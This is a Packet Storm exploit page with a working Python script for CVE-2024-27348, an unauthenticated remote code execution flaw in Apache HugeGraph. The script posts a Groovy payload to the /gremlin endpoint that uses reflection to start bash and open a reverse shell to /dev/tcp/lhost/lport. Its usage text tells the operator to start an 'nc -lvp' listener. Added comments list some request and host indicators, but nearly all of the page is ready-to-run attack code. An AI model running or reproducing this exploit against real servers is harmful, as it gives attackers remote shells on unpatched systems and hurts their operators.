## https://sploitus.com/exploit?id=PACKETSTORM:190369
Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
    # Exploit Author: Yesith Alvarez
    # Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
    # Version: Apache HugeGraph 1.0.0 - 1.2.0
    # CVE : CVE-2024-27348
    
    from requests import Request, Session
    import sys
    import json
    
    def title():
        """Print the ASCII-art banner and the author credits to stdout."""
        # The literal is deliberately not a raw string: none of its backslash
        # pairs is a recognised escape, so every backslash prints literally.
        # The trailing space after the last backslash on the third art row
        # keeps that backslash from acting as a line continuation.
        banner = '''
        
       ______     _______     ____   ___ ____  _  _        ____ _____ _____ _  _    ___  
      / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \___  |___ /| || |  ( _ ) 
     | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) | / /  |_ \| || |_ / _ \ 
     | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/ / /  ___) |__   _| (_) |
      \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____/_/  |____/   |_|  \___/ 
    
    [+] Reverse shell                                                                                                                                                                                     
    Author: Yesith Alvarez
    Github: https://github.com/yealvarez
    Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024โ€“27348/exploit.py
        '''
        print(banner)
    
    
    def exploit(url, lhost, lport):       
        """Send one POST to ``<url>/gremlin`` carrying a Groovy script, then print the exchange.

        The script placed in the ``gremlin`` field uses Java reflection to set the
        current thread's ``name`` field to "VICARIUS", look up
        ``java.lang.ProcessBuilder`` by name, construct it with a command list and
        invoke ``start``. The command list runs ``bash -c`` with a string that
        references ``/dev/tcp/<lhost>/<lport>``.

        Args:
            url: Base URL of the server; ``/gremlin`` is appended to it.
            lhost: Host string concatenated, unescaped, into the script text.
            lport: Port string concatenated, unescaped, into the script text.

        Returns:
            None. The request headers, URL, response headers, payload, status
            code and response body are printed to stdout.

        Defensive notes (for readers analysing this sample):
            * Request-side indicators visible in this code: a POST to ``/gremlin``
              with ``"language": "gremlin-groovy"`` whose script text contains
              ``Class.forName``, ``setAccessible`` and ``java.lang.ProcessBuilder``,
              and that is sent without a Content-Type header.
            * Host-side indicators implied by the script: the server's Java
              process starting ``bash``, and a thread named "VICARIUS".
            * The page header labels the issue unauthenticated; the fixed release
              and hardening steps are not stated on this page -- take them from the
              vendor advisory for the CVE named in the header.
        """
        # The whole Groovy script is one string literal; lhost and lport are
        # spliced in by plain concatenation with no validation or escaping.
        # NOTE(review): the page does not say why the thread is renamed.
        payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
        headers = {    
        'Content-Type': 'application/json'}
        s = Session()
        url = url + "/gremlin"
        # Build and prepare the request by hand so its headers can be edited
        # before it is sent.
        req = Request('POST', url, json=payload, headers=headers)
        prepped = req.prepare()
        # The Content-Type set above is removed again here, so the JSON body
        # goes out with no Content-Type header at all.
        del prepped.headers['Content-Type']
        # verify=False turns off TLS certificate verification for this request;
        # the request is given a 15-second timeout.
        resp = s.send(prepped,
        verify=False,
        timeout=15)
        # Dump both sides of the exchange to stdout; nothing is returned.
        print(prepped.headers)
        print(url)
        print(resp.headers)       
        print(payload)
        print(resp.status_code)
        print(resp.text)
    
    
    if __name__ == '__main__':
        # Entry point: always print the banner first. Three positional
        # arguments are expected (target base URL, lhost, lport); with fewer,
        # the usage text is printed and the process exits with status 0.
        title()
        argv = sys.argv
        if len(argv) >= 4:
            # Arguments are handed through as raw strings, unvalidated.
            exploit(argv[1], argv[2], argv[3])
        else:
            script = argv[0]
            print('[+] USAGE: python3 %s https://<target_url> lhost lport \n' % script)
            print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n' % script)
            print('[+] Do not forget to run the listener: nc -lvp 4444\n')
            exit(0)